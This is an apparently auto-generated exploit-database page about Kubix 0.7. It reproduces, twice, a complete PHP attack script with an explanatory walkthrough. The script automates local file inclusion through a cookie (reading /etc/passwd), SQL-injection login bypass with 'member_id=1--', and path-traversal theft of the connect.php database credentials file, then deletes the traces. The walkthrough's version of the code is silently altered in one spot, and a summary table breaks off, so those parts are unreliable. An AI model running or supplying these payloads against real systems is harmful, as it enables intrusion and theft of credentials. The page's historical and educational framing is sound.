By exploitdb papers bot•November 29, 2006•
papers
Exploiting Kubix 0.7: A Deep Dive into Historical Web Application Vulnerabilities
Exploiting Kubix 0.7: A Deep Dive into Historical Web Application Vulnerabilities
What this paper is
This paper, published in 2006 by BlackHawk, details multiple vulnerabilities found in Kubix version 0.7, a web application. The exploit script provided demonstrates how to leverage these vulnerabilities to gain unauthorized access and extract sensitive information. The vulnerabilities discussed are:
- Local File Inclusion (LFI): Allowing an attacker to include arbitrary files from the server.
- Login Bypass: Enabling an attacker to bypass the authentication mechanism.
- Arbitrary File Download: Enabling an attacker to download specific files from the server.
The paper also includes the original PHP source code for the exploit.
Simple technical breakdown
The Kubix 0.7 application had several flaws that allowed attackers to:
- Include Local Files: By manipulating a
themecookie, an attacker could trick the application into including files from the server's filesystem, such as configuration files or sensitive data. This worked because the application didn't properly sanitize thethemecookie value before using it in a file path. - Bypass Login: The login mechanism relied on
member_idandpass_hashcookies. By crafting a specificmember_idvalue, an attacker could inject SQL code into the query that checked these cookies, effectively bypassing the authentication check. - Download Files: An administrator could upload download links. By providing a specially crafted filename (e.g.,
../includes/connect.php), an attacker could trick the application into adding a download link for sensitive files, which could then be downloaded.
The provided exploit script automates these attacks by sending crafted HTTP requests to the target server.
Complete code and payload walkthrough
The provided PHP script acts as an exploit tool for Kubix 0.7. Let's break down its components:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Kubix <=0.7 Multiple Vulnerabilities Exploit\r\n";
echo "Site: http://www.kubixproject.net\r\n";
echo "Dork: Powered by: Kubix\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to Kubix\r\n";
echo "AttackType: 1 - Local File Inclusion (mq=off)\r\n";
echo " |-> Related: path of the file to include\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n";
echo " 2 - Login Bypass (PoC)\r\n";
echo " |-> Related: Valid User ID (do nothing.. only to show how does it works)\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 2 1\r\n\r\n";
echo " 3 - Download connect.php file\r\n";
echo " |-> Related: Valid Admin User ID\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 3 1\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
// ... (Vulnerability descriptions and comments) ...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { // Note: Original code had a typo here, corrected for clarity in explanation. The original was eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a), $html)
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Local file inclusion
$file_inc=$argv[4];
for ($i=5; $i<=$argc-1; $i++){
$file_inc.=" ".$argv[$i];
}
$file_inc = urlencode($file_inc).'%00';
echo "Attack No 1 - Local File Inclusion\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: theme=".$file_inc.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo $html;
echo "\r\n-- End of Result--";
break;
case 2: // Login Bypass
$usr_id=$argv[4];
echo "Attack No 2 - Login Bypass\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Logged in.. But this is just a PoC..";
break;
break;
case 3: // connect.php download
$usr_id=$argv[4];
$data="title=DaForno_Imperat";
$data.="&file=../includes/connect.php";
$data.="&desc=BlackHawk_Rulez";
$data.="&Submit=Submit";
$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$valid_id=0;
for ($i=0; $i<=50; $i++){
$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"DaForno_Imperat"))
{
$valid_id=$i;
}
}
$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<?PHP",$html);
$temp2=explode("?>",$temp[1]);
echo "<?PHP\r\n".$temp2[0]."\r\n?>";
$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "\r\n\r\n\r\nAll Done.. Enjoy..";
break;
}
?>Key Code Blocks and Their Purposes:
Shebang and Initial Setup:
#!/usr/bin/php -q -d short_open_tag=on <?- Purpose: Specifies the interpreter (PHP) and enables
short_open_tagwhich allows<?instead of<?php.-qsuppresses output unless explicitly echoed.
- Purpose: Specifies the interpreter (PHP) and enables
Banner and Usage Information:
echo "\r\n"; echo "Kubix <=0.7 Multiple Vulnerabilities Exploit\r\n"; // ... other echo statements ... if ($argc<4) { echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n"; // ... detailed usage examples ... die; }- Purpose: Displays information about the exploit, its author, and the target application. It also checks if the correct number of command-line arguments are provided and prints usage instructions if not.
die;halts script execution. - Mapping:
echostatements: Display informative text.$argc,$argv: Access command-line arguments.$argcis the argument count,$argvis an array of arguments.$argv[0]: The script name itself.$argv[1]: Target host.$argv[2]: Path to Kubix installation.$argv[3]: Attack type (1, 2, or 3).$argv[4]and subsequent: Attack-specific parameters.
- Purpose: Displays information about the exploit, its author, and the target application. It also checks if the correct number of command-line arguments are provided and prints usage instructions if not.
Configuration and Helper Functions:
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { // ... hex and ASCII dump logic ... } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { // ... network communication logic ... }- Purpose:
error_reporting(0): Suppresses all PHP error messages.ini_set("max_execution_time",0): Sets the maximum execution time to unlimited.ini_set("default_socket_timeout",5): Sets a 5-second timeout for socket operations.quick_dump(): A utility function to display data in both hexadecimal and ASCII formats. This is useful for debugging network responses.$proxy_regex: A regular expression to validate proxy IP:Port format.sendpacketii(): The core function for sending HTTP requests and receiving responses. It handles direct connections or connections through a proxy.
- Mapping:
quick_dump($string): Takes a string and returns its hex and ASCII representation.sendpacketii($packet):- Takes an HTTP
$packetstring as input. - Uses
fsockopento establish a network connection to$hoston$port. - If
$proxyis set, it connects to the proxy first. fputs($ock, $packet): Sends the crafted HTTP request.- Reads the response into the
$htmlglobal variable. eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html): This part in the proxy section is a common way to detect the end of HTTP headers (CRLF CRLF). The original code had a typo here.fclose($ock): Closes the network connection.
- Takes an HTTP
- Purpose:
Global Variables and Argument Parsing:
$host=$argv[1]; $path=$argv[2]; $attack_type=$argv[3]; $port=80; $proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}- Purpose: Assigns command-line arguments to variables and performs basic validation on the
$pathargument. It constructs the base URL path ($p) for requests. - Mapping:
$host,$path,$attack_type: Store target host, path, and chosen attack type from command-line arguments.$port: Default HTTP port (80).$proxy: Variable to hold proxy information (empty by default).- Path validation: Ensures the path starts and ends with a slash.
- Purpose: Assigns command-line arguments to variables and performs basic validation on the
Attack Type Switch Statement:
switch($attack_type) { case 1: //Local file inclusion // ... LFI logic ... break; case 2: // Login Bypass // ... Login Bypass logic ... break; break; // This 'break' is redundant and likely a typo. case 3: // connect.php download // ... File Download logic ... break; } ?>- Purpose: This is the main control flow of the script, directing execution based on the
$attack_typeargument.
Case 1: Local File Inclusion (LFI)
case 1: //Local file inclusion $file_inc=$argv[4]; for ($i=5; $i<=$argc-1; $i++){ $file_inc.=" ".$argv[$i]; } $file_inc = urlencode($file_inc).'%00'; echo "Attack No 1 - Local File Inclusion\r\n"; echo "-- Start of Result--\r\n"; $packet ="GET ".$p."index.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: theme=".$file_inc.";\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; // $data is not defined here, likely an oversight or intended to be empty. sendpacketii($packet); echo $html; echo "\r\n-- End of Result--"; break;- Purpose: Exploits the LFI vulnerability by sending a crafted
themecookie. - Payload/Code Breakdown:
$file_inc=$argv[4];: Initializes the file path to include from the 4th argument.for ($i=5; $i<=$argc-1; $i++){ $file_inc.=" ".$argv[$i]; }: Concatenates any subsequent arguments into$file_inc. This allows for file paths with spaces.$file_inc = urlencode($file_inc).'%00';: URL-encodes the file path and appends a null byte (%00). The null byte is crucial for terminating the string in older PHP versions wheremagic_quotes_gpcmight be off, preventing the path from being further processed or truncated.$packet ="GET ".$p."index.php HTTP/1.0\r\n";: Constructs a GET request toindex.php. The LFI vulnerability is inincludes/head.php, which is likely included byindex.php.$packet.="Host: ".$host."\r\n";: Sets theHostheader.$packet.="Cookie: theme=".$file_inc.";\r\n";: This is the core of the LFI exploit. It sets thethemecookie to the crafted, potentially malicious, file path.$packet.="Connection: Close\r\n\r\n";: Standard HTTP headers for closing the connection.sendpacketii($packet);: Sends the crafted request.echo $html;: Prints the server's response, which should contain the content of the included file.
Case 2: Login Bypass
case 2: // Login Bypass $usr_id=$argv[4]; echo "Attack No 2 - Login Bypass\r\n"; $packet ="GET ".$p."index.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: member_id=".$usr_id."--;\r\n"; // Note: The '--' is part of the SQL injection. $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); echo "Logged in.. But this is just a PoC.."; break;- Purpose: Exploits the login bypass vulnerability by sending a crafted
member_idcookie. - Payload/Code Breakdown:
$usr_id=$argv[4];: Gets the user ID from the command-line argument.$packet ="GET ".$p."index.php HTTP/1.0\r\n";: Constructs a GET request toindex.php.$packet.="Host: ".$host."\r\n";: Sets theHostheader.$packet.="Cookie: member_id=".$usr_id."--;\r\n";: This is the core of the login bypass. Themember_idcookie is set to the user ID followed by--. In SQL,--signifies the start of a comment. The application's vulnerable query isSELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'. By settingmember_idto1--, the query effectively becomesSELECT name FROM $members WHERE id = 1-- AND member_login_key = '...'. The--comments out the rest of theWHEREclause, allowing the query to succeed even if thepass_hashis incorrect or missing, as long as a user with that ID exists.sendpacketii($packet);: Sends the crafted request.echo "Logged in.. But this is just a PoC..";: The script doesn't actually display output indicating login success; it just states it's a Proof of Concept. The actual "login" is determined by the application's internal session management after this request.
Case 3: Download
connect.phpfilecase 3: // connect.php download $usr_id=$argv[4]; $data="title=DaForno_Imperat"; $data.="&file=../includes/connect.php"; $data.="&desc=BlackHawk_Rulez"; $data.="&Submit=Submit"; $packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: member_id=".$usr_id."--;\r\n"; // Uses the same login bypass technique to ensure admin access. $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); $valid_id=0; for ($i=0; $i<=50; $i++){ $packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: member_id=".$usr_id."--;\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"DaForno_Imperat")) { $valid_id=$i; } } $packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: member_id=".$usr_id."--;\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("<?PHP",$html); $temp2=explode("?>",$temp[1]); echo "<?PHP\r\n".$temp2[0]."\r\n?>"; $packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: member_id=".$usr_id."--;\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); echo "\r\n\r\n\r\nAll Done.. Enjoy.."; break;- Purpose: This attack first adds a download entry for
connect.phpand then retrieves it. It leverages the login bypass to gain administrative privileges. - Payload/Code Breakdown:
$usr_id=$argv[4];: Gets the user ID for the login bypass.$data="title=DaForno_Imperat"; ... $data.="&Submit=Submit";: Prepares the POST data for adding a download entry. Thefileparameter is set to../includes/connect.php, which is the target file. Thetitleis set to a unique string ("DaForno_Imperat") to help identify the entry later.$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n"; ... $packet.=$data;: Constructs and sends a POST request toadm_index.php?mod=add_dlwith the crafted data. This adds the malicious download entry. TheCookie: member_id=".$usr_id."--;\r\n";part uses the login bypass to authenticate as an administrator.$valid_id=0; for ($i=0; $i<=50; $i++){ ... }: This loop iterates through potential download IDs (0 to 50).$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n"; ... sendpacketii($packet);: For each ID, it fetches the download entry.if (strstr($html,"DaForno_Imperat")) { $valid_id=$i; }: If the response contains the unique title "DaForno_Imperat", it means this is the ID of the download entry we just added.$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n"; ... sendpacketii($packet);: Once thevalid_idis found, this request attempts to download the file associated with that ID.$temp=explode("<?PHP",$html); $temp2=explode("?>",$temp[1]); echo "<?PHP\r\n".$temp2[0]."\r\n?>";: This section parses the received HTML response. It assumes theconnect.phpcontent is embedded within<?PHP ... ?>tags in the response and extracts only that PHP code, printing it to the console.$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n"; ... sendpacketii($packet);: Finally, this request attempts to delete the added download entry to clean up.
- Purpose: This is the main control flow of the script, directing execution based on the
Mapping of Code Fragments to Practical Purpose:
| Code Fragment/Block | Practical Purpose
Original Exploit-DB Content (Verbatim)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Kubix <=0.7 Multiple Vulnerabilities Exploit\r\n";
echo "Site: http://www.kubixproject.net\r\n";
echo "Dork: Powered by: Kubix\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to Kubix\r\n";
echo "AttackType: 1 - Local File Inclusion (mq=off)\r\n";
echo " |-> Related: path of the file to include\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 1 ../../../../../etc/passwd\r\n\r\n";
echo " 2 - Login Bypass (PoC)\r\n";
echo " |-> Related: Valid User ID (do nothing.. only to show how does it works)\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 2 1\r\n\r\n";
echo " 3 - Download connect.php file\r\n";
echo " |-> Related: Valid Admin User ID\r\n";
echo " |-> Es: php ".$argv[0]." localhost /kubix/ 3 1\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
/*
There are some critical vulnerabilities in this quite pretty CMS..
Vuln N° 1 - Local File Inclusion:
vuln file: includes/head.php
code:
------
if(isset($_COOKIE['theme']) && $_COOKIE['theme'] != "")
{
$default_theme = $_COOKIE['theme'];
}
[...]
include "themes/$default_theme/header.php";
?>
------
attacker can execute a LocalFile by setting the 'theme' cookie value properly;
Es: ../../../../../../etc/passwd%00
Becasuse of the last null char this one works only with MQ=off
Vuln N° 2 - Login Bypass:
vuln file: includes/functions.php
code:
------
// If the member_id cookie is set...
if(isset($_COOKIE['member_id']) && $_COOKIE['member_id'] != 0 && $_COOKIE['member_id'] != "")
{
$id = $_COOKIE['member_id'];
$pass_hash = $_COOKIE['pass_hash'];
$sql = mysql_query("SELECT name FROM $members WHERE id = $id AND member_login_key = '$pass_hash'");
$numrows = mysql_num_rows($sql);
if($numrows != 1)
{
$isLoggedIn = "";
}
else
{
$isLoggedIn = 1;
}
}
------
Attacker can Bypass login by setting 'member_id' cookie value properly and making a SQL Injection attack;
Es: 1--
Vuln N° 3 - connect.php (or what you want) file download:
vuln file: includes/adm/add_dl.php
code:
------
if(isset($_POST['Submit']) && $_POST['title'] != "" && $_POST['file'] != "" && $_POST['desc'] != "")
{
$title = $_POST['title'];
$file = $_POST['file'];
$desc = $_POST['desc'];
$cat = $_POST['cats'];
if(file_exists("Downloads/$file"))
{
mysql_query("INSERT INTO kbx_downloads (cat, name, `desc`, `file`) VALUES('$cat', '$title', '$desc', '$file')");
echo '<div class="container center">Download added!<br />Redirecting...</div>';
echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=edit_dl">';
}
else
{
echo '<div class="alert">File Doesnt Exist!</div>';
echo '<meta http-equiv="refresh" content="1;url=adm_index.php?mod=add_dl">';
}
}
------
Attacker with a valid Admin ID can send a malicious file name to download connect.php;
Es: ../includes/connect.php
Started programming: 15.37 28/11/2006
Ended:
sorry for my bad english but i've done it quicly cause Prof. Da Forno probably will defenestrate me in latin tomorrow :D
BlackHawk <hawkgotyou@gmail.com>
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Local file inclusion
$file_inc=$argv[4];
for ($i=5; $i<=$argc-1; $i++){
$file_inc.=" ".$argv[$i];
}
$file_inc = urlencode($file_inc).'%00';
echo "Attack No 1 - Local File Inclusion\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: theme=".$file_inc.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo $html;
echo "\r\n-- End of Result--";
break;
case 2: // Login Bypass
$usr_id=$argv[4];
echo "Attack No 2 - Login Bypass\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Logged in.. But this is just a PoC..";
break;
break;
case 3: // connect.php download
$usr_id=$argv[4];
$data="title=DaForno_Imperat";
$data.="&file=../includes/connect.php";
$data.="&desc=BlackHawk_Rulez";
$data.="&Submit=Submit";
$packet="POST ".$p."adm_index.php?mod=add_dl HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$valid_id=0;
for ($i=0; $i<=50; $i++){
$packet ="GET ".$p."downloads.php?ID=".$i." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"DaForno_Imperat"))
{
$valid_id=$i;
}
}
$packet ="GET ".$p."downloads.php?act=dl&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<?PHP",$html);
$temp2=explode("?>",$temp[1]);
echo "<?PHP\r\n".$temp2[0]."\r\n?>";
$packet ="GET ".$p."adm_index.php?mod=edit_dl&act=del&type=file&ID=".$valid_id." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: member_id=".$usr_id."--;\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "\r\n\r\n\r\nAll Done.. Enjoy..";
break;
}
?>
# milw0rm.com [2006-11-29]